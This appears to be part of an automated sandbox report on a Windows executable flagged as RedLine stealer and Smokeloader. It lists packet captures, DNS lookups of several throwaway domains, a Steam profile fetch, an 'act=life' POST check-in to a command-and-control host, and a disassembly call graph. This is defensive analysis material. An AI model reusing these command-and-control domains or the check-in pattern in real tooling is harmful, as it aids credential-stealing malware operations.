                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:09.651163101 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:09.705044985 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:09.747342110 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476686001 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476722956 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476733923 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476751089 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476759911 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476804972 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476862907 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476885080 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.476914883 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.656766891 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.656816006 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.656869888 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.656883001 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.656925917 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.687675953 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.687716961 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.687766075 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.687794924 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.687813997 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.688813925 CET49705443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.688833952 CET4434970523.55.153.106192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.832407951 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.832469940 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.832535982 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.833019018 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.833031893 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.050713062 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.050992966 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.053426027 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.053448915 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.053730011 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.054924965 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.054924965 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.055017948 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.811551094 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.811650991 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.811817884 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.812163115 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.812180042 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.812216043 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.812222004 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.916273117 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.916318893 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.916418076 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.916711092 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:12.916728973 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:13.830657959 CET49707443192.168.2.8172.67.157.254

                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:05.853013992 CET5310053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:05.997129917 CET53531001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.013971090 CET4971353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.247406960 CET53497131.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.250945091 CET6470853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.480895996 CET53647081.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.482372046 CET5688553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.700800896 CET53568851.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.702284098 CET5819253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.010374069 CET53581921.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.012100935 CET5776953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.236182928 CET53577691.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.237760067 CET6306653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.463104010 CET53630661.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.471700907 CET5794153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.695832014 CET53579411.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.795280933 CET6514653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.106158018 CET53651461.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.108994007 CET5334553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.246706009 CET53533451.1.1.1192.168.2.8
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.693633080 CET6442053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.831422091 CET53644201.1.1.1192.168.2.8

                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:05.853013992 CET192.168.2.81.1.1.10xc8bcStandard query (0)spellshagey.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.013971090 CET192.168.2.81.1.1.10x5daaStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.250945091 CET192.168.2.81.1.1.10x2defStandard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.482372046 CET192.168.2.81.1.1.10x5df2Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.702284098 CET192.168.2.81.1.1.10x594aStandard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.012100935 CET192.168.2.81.1.1.10x9216Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.237760067 CET192.168.2.81.1.1.10xca74Standard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.471700907 CET192.168.2.81.1.1.10xccdbStandard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.795280933 CET192.168.2.81.1.1.10x6d9dStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.108994007 CET192.168.2.81.1.1.10xf268Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.693633080 CET192.168.2.81.1.1.10xac7eStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:05.997129917 CET1.1.1.1192.168.2.80xc8bcName error (3)spellshagey.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.247406960 CET1.1.1.1192.168.2.80x5daaName error (3)immureprech.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.480895996 CET1.1.1.1192.168.2.80x2defName error (3)deafeninggeh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:06.700800896 CET1.1.1.1192.168.2.80x5df2Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.010374069 CET1.1.1.1192.168.2.80x594aName error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.236182928 CET1.1.1.1192.168.2.80x9216Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.463104010 CET1.1.1.1192.168.2.80xca74Name error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:07.695832014 CET1.1.1.1192.168.2.80xccdbName error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.106158018 CET1.1.1.1192.168.2.80x6d9dName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:08.246706009 CET1.1.1.1192.168.2.80xf268No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.831422091 CET1.1.1.1192.168.2.80xac7eNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Dec 24, 2024 09:05:10.831422091 CET1.1.1.1192.168.2.80xac7eNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                        • lev-tolstoi.com

                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.84970523.55.153.1064431564C:\Users\user\Desktop\3zg6i6Zu1u.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-12-24 08:05:09 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                        2024-12-24 08:05:10 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 08:05:10 GMT
                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: sessionid=961e72f9998caf5f7a0337ff; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                        2024-12-24 08:05:10 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                        2024-12-24 08:05:10 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                        2024-12-24 08:05:10 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                        Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.849706172.67.157.2544431564C:\Users\user\Desktop\3zg6i6Zu1u.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-12-24 08:05:12 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2024-12-24 08:05:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                        2024-12-24 08:05:12 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 08:05:12 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=u3t2hgrilr03r839jjhuvkvv5b; expires=Sat, 19 Apr 2025 01:51:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iiq5SJC7JxJBK43tbhaSe0KAc5GXAkpBsdnBmkxfohJCMP%2FuEuFnefK2YbXSaa7mkf%2FFmRKKsUdETX1VZIFItkKl%2BEDFvJ7Mqk7V21mTHKCavGeaUmrzQfd6s2MwT1d556A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8f6f15c00b48c35a-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1621&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1753753&cwnd=247&unsent_bytes=0&cid=8c9b16c3830b48bd&ts=772&x=0"
                                                                                                                                                                                                                                                        2024-12-24 08:05:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                        2024-12-24 08:05:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                        Start time:03:05:02
                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\3zg6i6Zu1u.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\3zg6i6Zu1u.exe"
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        File size:340'992 bytes
                                                                                                                                                                                                                                                        MD5 hash:996AA4B544E08689F305D751C60835C7
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                        Start time:03:05:13
                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1784
                                                                                                                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:23.7%
                                                                                                                                                                                                                                                          Signature Coverage:50.8%
                                                                                                                                                                                                                                                          Total number of Nodes:118
                                                                                                                                                                                                                                                          Total number of Limit Nodes:7
                                                                                                                                                                                                                                                          execution_graph 25902 43a92b RtlAllocateHeap 25903 43c5af GetForegroundWindow 25907 43e240 25903->25907 25905 43c5bb GetForegroundWindow 25906 43c5cc 25905->25906 25908 43e250 25907->25908 25908->25905 25909 4085d0 25911 4085df 25909->25911 25910 4087e3 ExitProcess 25911->25910 25912 4085f4 GetCurrentProcessId GetCurrentThreadId 25911->25912 25913 4087d9 25911->25913 25914 408621 25912->25914 25915 408625 SHGetSpecialFolderPathW GetForegroundWindow 25912->25915 25913->25910 25914->25915 25916 408736 25915->25916 25916->25913 25918 40c5c0 CoInitializeEx 25916->25918 25919 40a1b0 25920 40a290 25919->25920 25920->25920 25923 40ad40 25920->25923 25922 40a2ba 25924 40add0 25923->25924 25924->25924 25926 40adf5 25924->25926 25927 43c2d0 25924->25927 25926->25922 25928 43c2f6 25927->25928 25929 43c315 25927->25929 25930 43c2e8 25927->25930 25933 43c30a 25927->25933 25932 43c2fb RtlReAllocateHeap 25928->25932 25934 43a940 25929->25934 25930->25928 25930->25929 25932->25933 25933->25924 25935 43a953 25934->25935 25936 43a955 25934->25936 25935->25933 25937 43a95a RtlFreeHeap 25936->25937 25937->25933 25938 43ca12 25939 43ca20 25938->25939 25942 43ca5e 25939->25942 25944 43c330 LdrInitializeThunk 25939->25944 25941 43cb02 25942->25941 25945 43c330 LdrInitializeThunk 25942->25945 25944->25942 25945->25941 25946 40a573 25947 40a588 25946->25947 25950 40a8c0 25947->25950 25953 40a8f0 25950->25953 25951 40a591 25952 43a940 RtlFreeHeap 25952->25951 25953->25951 25953->25952 25953->25953 25954 43e430 25956 43e450 25954->25956 25955 43e57e 25956->25955 25958 43c330 LdrInitializeThunk 25956->25958 25958->25955 25959 40c5f5 CoInitializeSecurity 25960 40d0f8 25964 401f60 25960->25964 25962 40d101 CoUninitialize 25963 40ec59 25962->25963 25965 401f6e 25964->25965 25966 43c7fb 25967 43c840 25966->25967 25967->25967 25968 43c99e 25967->25968 25970 43c330 LdrInitializeThunk 25967->25970 25970->25968 25971 247003c 25972 2470049 25971->25972 25986 2470e0f SetErrorMode SetErrorMode 25972->25986 25977 2470265 25978 24702ce VirtualProtect 25977->25978 25980 247030b 25978->25980 25979 2470439 VirtualFree 25984 24705f4 LoadLibraryA 25979->25984 25985 24704be 25979->25985 25980->25979 25981 24704e3 LoadLibraryA 25981->25985 25983 24708c7 25984->25983 25985->25981 25985->25984 25987 2470223 25986->25987 25988 2470d90 25987->25988 25989 2470dad 25988->25989 25990 2470dbb GetPEB 25989->25990 25991 2470238 VirtualAlloc 25989->25991 25990->25991 25991->25977 25992 9a9006 25993 9a9001 25992->25993 25993->25992 25996 9a94be 25993->25996 25997 9a94cd 25996->25997 26000 9a9c5e 25997->26000 26001 9a9c79 26000->26001 26002 9a9c82 CreateToolhelp32Snapshot 26001->26002 26003 9a9c9e Module32First 26001->26003 26002->26001 26002->26003 26004 9a9cad 26003->26004 26005 9a94bd 26003->26005 26007 9a991d 26004->26007 26008 9a9948 26007->26008 26009 9a9959 VirtualAlloc 26008->26009 26010 9a9991 26008->26010 26009->26010 26010->26010 26011 40c63c 26012 40c650 26011->26012 26017 437bc0 26012->26017 26014 40c6c9 26015 437bc0 11 API calls 26014->26015 26016 40caf9 26015->26016 26018 437bf0 CoCreateInstance 26017->26018 26020 437df3 SysAllocString 26018->26020 26021 438205 26018->26021 26024 437e6f 26020->26024 26023 438215 